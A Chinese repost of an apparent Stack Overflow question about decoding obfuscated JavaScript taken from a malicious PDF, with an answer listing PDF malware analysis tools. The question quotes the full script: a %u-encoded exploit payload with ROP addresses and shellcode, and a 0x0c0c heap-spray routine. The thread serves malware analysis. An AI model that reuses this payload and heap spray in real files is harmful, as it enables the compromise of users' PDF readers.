程序员经验分享-hwhale

从恶意 PDF 中提取 JavaScript

2024-04-27

我有一个 PDF 文件,据我所知,它包含一个 JavaScript 脚本文件,该文件会执行恶意操作,但目前还不确定具体是什么。

我已经成功解压缩了 PDF 文件并获得了纯文本 JavaScript 源代码,但它的代码本身隐藏在我以前从未见过的语法中。

代码示例:这就是大部分代码的样子

var bDWXfJFLrOqFuydrq = unescape;
var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....')

我想这种带有长变量/函数名称和隐藏文本字符的表示法会让寻找这些类型的东西的扫描仪感到困惑。

两个问题:

问题1

谁能告诉我这叫什么%u4141?

问题2

是否有某种工具可以将该符号转换为纯文本,以便我可以看到它在做什么?

完整的JS代码:

var B = unescape('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uadba%u8e19%uda62%ud9cb%u2474%u58f4%uc931%u49b1%u5031%u8314%ufce8%u5003%u4f10%u72ec%u068a%u8b0f%u784b%u6e99%uaa7a%ufbfd%u7a2f%ua975%uf1c3%u5adb%u7757%u6df4%u3dd0%u4322%uf0e1%u0fea%u9321%u4d96%u7376%u9da6%u728b%uc0ef%u2664%u8fb8%ud6d7%ud2cd%ud7eb%u5901%uaf53%u9e24%u0520%ucf26%u1299%uf760%u7c92%u0651%u9f76%u41ad%u6bf3%u5045%ua2d5%u62a6%u6819%u4a99%u7194%u6ddd%u0447%u8e15%u1efa%uecee%uab20%u57f3%u0ba2%u66d0%ucd67%u6593%u9acc%u69fc%u4fd3%u9577%u6e58%u1f58%u541a%u7b7c%uf5f8%u2125%u0aaf%u8d35%uae10%u3c3d%uc844%u291f%ue6a9%ua99f%u71a5%u9bd3%u296a%u907b%uf7e3%ud77c%u4fd9%u2612%uafe2%ued3a%uffb6%uc454%u94b6%ue9a4%u3a62%u45f5%ufadd%u25a5%u928d%ua9af%u82f2%u63cf%u289b%ue435%u0464%ufd34%u560c%ue837%udf7f%u78d1%u8990%u154a%u9009%u8401%u0fd6%u866c%ua35d%u4990%uce96%u3e82%u8556%ue9f9%u3069%u1597%ubefc%u413e%ubc68%ua567%u3f37%ubd42%ud5fe%uaa2d%u39fe%u2aae%u53a9%u42ae%u070d%u77fd%u9252%u2b91%u1cc7%u98c0%u7440%uc7ee%udba7%u2211%u2036%u0bc4%u50bc%u7862%u417c');

var C = unescape("%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0"+"c"+"0"+"c");

while (C.length + 20 + 8 < 65536) C+=C;

D = C.substring(0, (0x0c0c-0x24)/2);

D += B;
D += C;
E = D.substring(0, 65536/2);
while(E.length < 0x80000) E += E;
F = E.substring(0, 0x80000 - (0x1020-0x08) / 2);
var G = new Array();
for (H=0;H<0x1f0;H++) G[H]=F+"s";​

看起来您已经从 PDF 中提取了 JavaScript。你的问题似乎是分析这个 JavaScript 的。

由于这个主题(在看似无害的 PDF 文件中混淆并隐藏恶意 JavaScript 代码)似乎越来越受到恶意软件作者的欢迎,让我列出一些工具和网站,这些工具和网站被证明对剖析此类威胁的初学者有帮助:

  1. Didier Stevens 的 PDF 工具 http://blog.didierstevens.com/programs/pdf-tools/
  2. Didier Stevens 的 PDF 恶意软件截屏视频的第 1 部分(众多) http://www.youtube.com/watch?v=F3rpZT0gKXw(在YouTube上)
  3. Jay Berkenbilt 的 QPDF: http://qpdf.sourceforge.net/用于保留内容的 PDF 转换的实用程序(用于解压 PDF 中所有/大多数压缩对象的有用命令:
    qpdf --qdf original.pdf unpacked.pdf
    然后在文本编辑器中打开 unpacked.pdf)
  4. Julia Wolf 关于 PDF 恶意软件混淆的演示 http://blog.fireeye.com/files/julia_wolf_toorcon12_omg_wtf.pdf
  5. peepdf: http://code.google.com/p/peepdf/一个用于探索 PDF 的 Python 工具(找出它们是否是恶意的)
  6. PDF技巧: http://code.google.com/p/corkami/wiki/PDFTricksPDF 源代码混淆方法的(非详尽)列表
  7. Wepawet: http://wepawet.iseclab.org/用于分析 PDF/Javascript/Flash 文件的在线资源(生成报告)
  8. 折纸-PDF: http://code.google.com/p/origami-pdf/用于分析和生成恶意 PDF 的 Ruby 工具
  9. (...这里未列出更多资源...)

我不知道你到底是如何提取问题中提供的 Javascript 片段的。但是,无论如何,不​​要指望已经找到了allPDF 中的 JS 代码 - 除非您是 PDF 专家,知道在哪里查找以及如何发现所有可能的混淆。 (我建议您将第 3 号工具应用于您的源 PDF,并根据第 6 号中的提示查看生成的 PDF...其他工具可能需要更多地研究 PDF 语法,然后才能真正使它们有用给你。)

Update

这是我(将近 3 年前)的旧答案的更新。值得补充的是:

  1. pdfinfo -js http://poppler.freedesktop.org/:最新的(基于 Poppler!,不是基于 XPDF)版本pdfinfo(从...开始v0.25.0 http://poppler.freedesktop.org/releases.html,2013 年 12 月 11 日发布)现在知道了-js命令行参数,打印 PDF 文件中嵌入的 JavaScript 代码。

    即使对于许多情况,这也适用/JavaScriptPDF 源代码中的名称通过使用(正式合法的)PDF 名称结构进行混淆,例如/4Aavascript or /J#61v#61script或类似的。

    不幸的是,这个奇妙的功能除了pdfinfo人们仍然知之甚少。请分享!

Update 2

再次更新,因为上面提到peepdf工具最近得到了extract添加子命令:

  1. peepdf.js https://github.com/jesparza/peepdf:这是一个基于Python的命令行工具,可以分析PDF文件。它是由 Jose Miguel Esparza 开发的,主要目的是“查明该文件是否有害”,但对于 PDF 文件结构的一般探索也非常有用。

    安装及使用:

    1. 克隆 GitHub 存储库:
      git clone https://github.com/jesparza/peepdf git.peepdf.
    2. 创建一个符号链接到peepdf.py脚本并将其放入您的某个位置$PATH:
      cd git.clone ;
      ln -s $(pwd)/peepdf.py ${HOME}/bin/peepdf.py
    3. 以交互模式运行它,打开 PDF 文件:
      peepdf.py -fil my.pdf

    4. Use the extract js > all-js-in-my.pdf命令提取并重定向其中包含的所有 JavaScriptmy.pdf到一个文件中。下面的屏幕截图描述了这一点:

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

javascript

pdf

malware

从恶意 PDF 中提取 JavaScript 的相关文章

随机推荐

  • Kafka 一遍又一遍地重放消息 - 心跳会话已过期 - 标记协调器已死亡

    使用 python kafka api 从只有少量消息的主题中读取消息 Kafka 不断地一遍又一遍地重放队列中的消息 它从我的主题接收一条消息 返回每条消息内容 然后抛出ERROR Heartbeat session expired ma

  • 从字符串编译Java源代码? [复制]

    这个问题在这里已经有答案了 有没有办法让正在运行的Java程序编译Java源代码 作为字符串传递 Class newClass Compiler compile class ABC void xyz etc etc 理想情况下 传入源代码引

  • 在 PHP 中 RESTful 上传文件

    因此 我正在编写一个脚本 该脚本将通过 RESTful 接口将视频上传到服务器 文档告诉我 我应该将数据 包括二进制视频文件 作为 POST 请求的一部分传递 我知道如何设置我的 POST 变量 但我不知道如何处理二进制数据 API 说我应

  • 在 jQuery 中替换元素并返回新元素

    如何替换 jQuery 中的元素并返回替换元素而不是被删除的元素 我有以下场景 我有很多复选框 一旦您单击其中一个 该复选框就会被加载图标取代 一旦发生一些 AJAX 事件 加载图标就会被勾号图标取代 使用 jQuery 的replaceW

  • 从弹出视图控制器传递数据

    我有两个视图控制器 我首先打开 当我按下按钮时 第二个视图控制器被推到导航控制器堆栈上 在这里 在第二个视图控制器中 我有一个表视图 当我点击某些行时 它们被选中 如复选框 并且与该行相关的一些数据被添加到数组中 现在 当我完成选择后 我想

  • 获取 gradle 构建的 aapt2 参数?

    我有兴趣尝试使用 aapt2 从命令行编译 Android 应用程序 当我尝试执行以下操作时 链接约束布局库时遇到问题aapt2 link命令 该程序从 Android studio gradle 成功构建 如何使 gradle 命令行调用

  • ASP.NET Core 2.2 中的路由本地化

    我正在使用 ASP NET Core 2 2 开发应用程序 并且正在努力解决如何实现路由本地化的问题 例如 根据请求 如果路线中未指定语言 我需要重定向到路线 en products 如果未指定语言 则从接受语言标头获取区域设置 下面的de

  • 如何在 Spring MVC 中使用延迟加载

    Spring MVC中如何使用延迟加载 我现在正在使用 eager 但这会使我的应用程序运行速度变慢 这是我的域的一部分 ManyToMany fetch FetchType EAGER JoinTable name NEWS TAG jo

  • 直接屏幕像素/帧缓冲区访问[关闭]

    Closed 这个问题需要多问focused help closed questions 目前不接受答案 我想尝试创建一个玩游戏的程序 IE 机器人 我希望能够直接访问屏幕上的像素 IE 让我的程序 看到 一场比赛 然后 采取行动 或者至少

  • Windows批处理文件-显示所有子文件夹

    我在使用 Windows 批处理文件返回 JUST 文件夹 忽略文件 时遇到困难 这就是我现在所拥有的 目前它正在返回文件和子子文件夹 for r g in xx do echo g 另外 假设我只想返回以几个不同前缀开头的文件夹 例如 我

  • 如何向 gitlab-ci.yml 添加多行 bash EOD 命令?

    这个问题已被问过多次 但大多数问题都很容易解决 尽管使用工具expect它没有像我预期的那样工作 usr bin expect lt

  • 在openxml中向Excel添加样式

    我想在打开的 Excel 文档中设置文本的前景色以写入文本 为此我尝试过 var stylesheet1 spreadSheet WorkbookPart WorkbookStylesPart Stylesheet Fills fills1

  • FF Addon SDK 有打开设置页面的 API 吗?

    I use 简单首选项 https developer mozilla org en US Add ons SDK High Level APIs simple prefs模块来配置插件设置 我怎么能够以编程方式打开插件的设置页面 我们这样

  • 无法使用激活器(Play Framework)加载本机库

    我正在尝试在 Play 2 4 x 应用程序中加载本机库 我编写了一个简单的测试 该测试在 IDE IntelliJ 和 SBT 中都运行良好 在这两种情况下我都设置java library path让测试运行 我在IDE中设置 Djava

  • 为什么我的 BST 根指针由于某种未知原因而发生变化?

    我正在尝试用 C 语言实现二叉搜索树数据结构 但遇到了一个错误 我的指针值由于我不明白的原因而发生变化 请参阅帖子底部的奇怪输出 删除函数和主要函数澄清输出来自何处 我的测试功能如下 int main void Bst bst Bst ca

  • 如何在 Dart 和 Flutter 中将时间四舍五入到最接近的一刻钟?

    我有一个DateTime并愿意四舍五入至 15 秒 或其他间隔 例如 2020 03 16 12 23 53 756 到 2020 03 16 12 23 45 000 和 2020 03 16 12 24 01 1234 到 2020 0

  • 如何缩进现有 OCaml 代码

    我有大约 30 000 行缩进严重的 OCaml 代码 包括 mly 和 mll 文件 并且想要缩进它们 我尝试在谷歌上搜索 ocaml indent 的变体 我能得到的最接近的结果是使用 Omlet vim 并一次缩进一行代码 在插入模式

  • 我的 React 项目中 Firestore 数据库的读取次数非常多

    我正在使用 React 和 firebase firestore 制作一个简单的 CRUD 应用程序 我目前有一组 产品 有四条记录 主页循环显示产品 import React useEffect useState from react i

  • 如何从模板类中的方法返回 NULL

    我有一个如下所示的方法 template

  • 从恶意 PDF 中提取 JavaScript

    我有一个 PDF 文件 据我所知 它包含一个 JavaScript 脚本文件 该文件会执行恶意操作 但目前还不确定具体是什么 我已经成功解压缩了 PDF 文件并获得了纯文本 JavaScript 源代码 但它的代码本身隐藏在我以前从未见过的

热门标签